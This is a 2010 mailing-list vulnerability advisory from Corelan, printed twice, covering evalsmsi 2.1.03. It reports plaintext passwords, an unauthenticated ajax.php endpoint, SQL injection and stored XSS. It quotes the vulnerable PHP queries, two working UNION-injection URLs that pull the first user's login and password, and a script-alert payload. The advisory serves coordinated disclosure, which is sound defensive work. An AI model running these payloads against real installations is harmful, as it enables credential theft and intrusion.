[Full-disclosure] CORELAN-10-008 - Multiple vulnerabilities found in evalmsi 2.1.03




|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| security@xxxxxxxxxx |
| |
|-------------------------------------------------[ EIP Hunters ]--|
| |
| Vulnerability Disclosure Report |
| |
|------------------------------------------------------------------|

Advisory : CORELAN-10-008
Disclosure date : February 4th, 2010


0x00 : Vulnerability information
--------------------------------

[*] Product : evalsmsi
[*] Version : 2.1.03
[*] URL : http://sourceforge.net/projects/evalsmsi/
[*] Platform : PHP/MySQL
[*] Type of vulnerability : SQL Injection, Authentication Bypass,
Cross-Site Scripting [*] Risk rating : High [*] Issue fixed in version : 2.2.00 [*] Vulnerability discovered by : ekse [*] Corelan Team is : corelanc0d3r, EdiStrosar, rick2600, mr_me, ekse, MarkoT,
sinn3r, Jacky & jnz


0x01 : Vendor description of software
-------------------------------------
From the vendor website:
"evalSMSI is a web application, developed in PHP / MySQL, to evaluate the Information Security Management System for some entities."


0x02 : Vulnerability details
----------------------------
evalsmsi 2.1.03 contains multiple vulnerabilities.


1 - Insecure storage of password
The passwords are stored in plaintext in the database.
table : authentification
column: password


2 - Authentication Bypass
While a valid username and password is needed to access the application, it is
possible to make requests via ajax.php. It doesn't give access to much
interesting information but the lack of authentication augments the risks
associated with the following vulnerabilities.


3 - SQL Injection
SQL injection is possible via the script ajax.php

The vulnerable code is the following (ajax.php, line 5):

$id = $_GET['query'];
$action = $_GET['action'];

$base = evalsmsiConnect();
switch ($action) {
case 'sub_par':
$request = "SELECT MAX(numero) FROM sub_paragraphe WHERE id_paragraphe="$id"";
break;
case 'question':
$request = "SELECT * FROM sub_paragraphe WHERE id_paragraphe="$id"";
break;
case 'num_quest':
$request = "SELECT MAX(numero) FROM question WHERE id_sub_paragraphe="$id"";
break;
default:
break;

As a proof-of-concept, it is possible to obtain the username and password
(in plaintext) of the first user with the following requests :

first user name
http://server/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20login,%20NULL,%20NULL,%20NULL%20FROM%
20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22

first user password
http://server/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20password,%20NULL,%20NULL,%20NULL%20FROM%
20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22


4 - Persistent Cross-Site Scripting

It is possible to inject Javascript in the comment box of reports. Normally
this would be less critical because you need a valid account to access reports.
However, due the preceding vulnerabilities it is possible to obtain valid
credentials.

As a proof of concept, the following string can be inserted in the comment box :

</textarea><script>alert('XSS found by Corelan Team');</script>



0x03 : Vendor communication
---------------------------
[*] January 14th, 2010 - First contact
[*] January 15th, 2010 - Vendor acknowledges the problems
[*] January 20th, 2010 - Update request
[*] February 1st, 2010 - Vendor update
[*] February 4th, 2010 - Version 2.2.00 released

Please note that the passwords are still stored in plaintext in the database
with this release, yet the fix for the SQL Injection and authentication bypass
are greatly lowering the risks.

We wish to thank Michel Dubois for his cooperation in fixing the bugs we
reported in a timely manner.

|------------------------------------------------------------------|
| __ __ |
| _________ ________ / /___ _____ / /____ ____ _____ ___ |
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |
| |
| http://www.corelan.be:8800 |
| security@xxxxxxxxxx |
| |
|-------------------------------------------------[ EIP Hunters ]--|
| |
| Vulnerability Disclosure Report |
| |
|------------------------------------------------------------------|

Advisory : CORELAN-10-008
Disclosure date : February 4th, 2010


0x00 : Vulnerability information
--------------------------------

[*] Product : evalsmsi
[*] Version : 2.1.03
[*] URL : http://sourceforge.net/projects/evalsmsi/
[*] Platform : PHP/MySQL
[*] Type of vulnerability : SQL Injection, Authentication Bypass,
Cross-Site Scripting
[*] Risk rating : High
[*] Issue fixed in version : 2.2.00
[*] Vulnerability discovered by : ekse
[*] Corelan Team is : corelanc0d3r, EdiStrosar, rick2600, mr_me, ekse, MarkoT,
sinn3r, Jacky & jnz


0x01 : Vendor description of software
-------------------------------------
From the vendor website:
"evalSMSI is a web application, developed in PHP / MySQL, to evaluate the
Information Security Management System for some entities."


0x02 : Vulnerability details
----------------------------
evalsmsi 2.1.03 contains multiple vulnerabilities.


1 - Insecure storage of password
The passwords are stored in plaintext in the database.
table : authentification
column: password


2 - Authentication Bypass
While a valid username and password is needed to access the application, it is
possible to make requests via ajax.php. It doesn't give access to much
interesting information but the lack of authentication augments the risks
associated with the following vulnerabilities.


3 - SQL Injection
SQL injection is possible via the script ajax.php

The vulnerable code is the following (ajax.php, line 5):

$id = $_GET['query'];
$action = $_GET['action'];

$base = evalsmsiConnect();
switch ($action) {
case 'sub_par':
$request = "SELECT MAX(numero) FROM sub_paragraphe WHERE id_paragraphe="$id"";
break;
case 'question':
$request = "SELECT * FROM sub_paragraphe WHERE id_paragraphe="$id"";
break;
case 'num_quest':
$request = "SELECT MAX(numero) FROM question WHERE id_sub_paragraphe="$id"";
break;
default:
break;

As a proof-of-concept, it is possible to obtain the username and password
(in plaintext) of the first user with the following requests :

first user name
http://server/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20login,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22

first user password
http://server/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20password,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22


4 - Persistent Cross-Site Scripting

It is possible to inject Javascript in the comment box of reports. Normally
this would be less critical because you need a valid account to access reports.
However, due the preceding vulnerabilities it is possible to obtain valid
credentials.

As a proof of concept, the following string can be inserted in the comment box :

</textarea><script>alert('XSS found by Corelan Team');</script>



0x03 : Vendor communication
---------------------------
[*] January 14th, 2010 - First contact
[*] January 15th, 2010 - Vendor acknowledges the problems
[*] January 20th, 2010 - Update request
[*] February 1st, 2010 - Vendor update
[*] February 4th, 2010 - Version 2.2.00 released

Please note that the passwords are still stored in plaintext in the database
with this release, yet the fix for the SQL Injection and authentication bypass
are greatly lowering the risks.

We wish to thank Michel Dubois for his cooperation in fixing the bugs we
reported in a timely manner.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

  • [Full-Disclosure] its all about timing
    ... Why do people look for vulnerabilities? ... They publish vuln info because they have customers that pay (or ... Full Disclosure issue must take into account the ... report vulns primarily to the vendor, in the hope that the vendor will ...
    (Full-Disclosure)
  • Multiple vulnerabilities in jCore
    ... Vendor Notification: August 1, 2012 ... High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in jCore, which can be exploited to perform Cross-Site Scripting and SQL Injection attacks. ...
    (Bugtraq)
  • Re: ROI (ROSI?) on IDP devices
    ... vulnerabilities go all the way up the application stack. ... after 2 to 7 days by IPS vendor. ... I'd say that's a useless IDP system, ... The signatures are lagging too far behind the vulnerabilities. ...
    (Focus-IDS)
  • [eVuln] 427BB Multiple Vulnerabilities (Cookie-based Authentication Bypass, SQL Injections, XSS)
    ... 427BB Multiple Vulnerabilities (Cookie-based Authentication Bypass, SQL Injections, XSS) ... Authentication bypass using modified cookie values. ... 427BB has Multiple SQL Injection Vulnerabilities. ...
    (Bugtraq)
  • Vulnerability Type Distributions in CVE
    ... Vulnerability Type Distributions in CVE ... Table 4 Analysis: Open and Closed Source ... lead to publicly reported vulnerabilities, ... are in the top 3 for OS vendor advisories. ...
    (Bugtraq)